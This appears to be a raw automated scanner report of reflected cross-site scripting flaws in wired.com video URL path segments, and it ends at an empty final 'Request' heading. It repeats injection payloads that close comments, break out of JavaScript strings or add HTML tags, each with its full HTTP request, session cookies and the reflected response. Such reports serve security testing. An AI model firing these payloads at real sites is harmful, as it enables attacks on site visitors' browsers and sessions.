GET /video5f8e8"><a>35211efdab/institute-for-business--home-safety/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29424 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:55:38 GMT Date: Mon, 22 Nov 2010 00:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video5f8e8"><a>35211efdab ss_institute-for-business--home-safety c_619269818001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a4846--><script>alert(1)</script>6c3251ea1d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29459 Vary: Accept-Encoding Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:56:12 GMT Date: Mon, 22 Nov 2010 00:51:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa4846--><script>alert(1)</script>6c3251ea1d1/institute-for-business--home-safety/619269818001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 489b5"><a>0e6e46c2951 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/institute-for-business--home-safety489b5"><a>0e6e46c2951/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:38 GMT Date: Mon, 22 Nov 2010 00:51:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_institute-for-business--home-safety489b5"><a>0e6e46c2951 c_619269818001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a92e5"-alert(1)-"76a44198558 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/institute-for-business--home-safetya92e5"-alert(1)-"76a44198558/619269818001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:44 GMT Date: Mon, 22 Nov 2010 00:52:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0885"><a>cdadafd2898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/institute-for-business--home-safety/619269818001a0885"><a>cdadafd2898 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:47 GMT Date: Mon, 22 Nov 2010 00:52:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_institute-for-business--home-safety c_619269818001a0885"><a>cdadafd2898"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bc23"-alert(1)-"45d1e9311d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/institute-for-business--home-safety/6192698180012bc23"-alert(1)-"45d1e9311d0 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=290 Expires: Mon, 22 Nov 2010 00:58:53 GMT Date: Mon, 22 Nov 2010 00:54:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f635"><a>1709f4fc8f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video8f635"><a>1709f4fc8f0/interviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29348 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:15 GMT Date: Mon, 22 Nov 2010 00:48:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video8f635"><a>1709f4fc8f0 ss_interviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c63"-alert(1)-"73f900c21ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/interviews89c63"-alert(1)-"73f900c21ca HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:56:15 GMT Date: Mon, 22 Nov 2010 00:51:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd1"><a>9854118d6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/interviewsb2cd1"><a>9854118d6a7 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_interviewsb2cd1"><a>9854118d6a7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f8c52--><script>alert(1)</script>16b9361acca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29490 Vary: Accept-Encoding Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:47:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videof8c52--><script>alert(1)</script>16b9361acca/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddcc0"><a>353379e16c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoddcc0"><a>353379e16c7/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:51:35 GMT Date: Mon, 22 Nov 2010 00:46:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoddcc0"><a>353379e16c7 ss_latest-videos c_featured"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"04386ae1d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1f6b3"-alert(1)-"04386ae1d6d/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:53:28 GMT Date: Mon, 22 Nov 2010 00:48:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... xt/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e120"><a>6ecc891057 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1e120"><a>6ecc891057/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:37 GMT Date: Mon, 22 Nov 2010 00:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1e120"><a>6ecc891057 c_featured"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ac09"-alert(1)-"553b38f47a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured7ac09"-alert(1)-"553b38f47a7/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:54:40 GMT Date: Mon, 22 Nov 2010 00:49:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb0d"><a>c42c591e361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/featuredeeb0d"><a>c42c591e361/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:53:29 GMT Date: Mon, 22 Nov 2010 00:48:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_featuredeeb0d"><a>c42c591e361"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4184d"-alert(1)-"2754dc14c34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/17165001894184d"-alert(1)-"2754dc14c34/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:54:42 GMT Date: Mon, 22 Nov 2010 00:49:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... xt/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab7c3"-alert(1)-"1a65c8b335a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-ascab7c3"-alert(1)-"1a65c8b335a/616369724001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c18"-alert(1)-"5548a503785 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
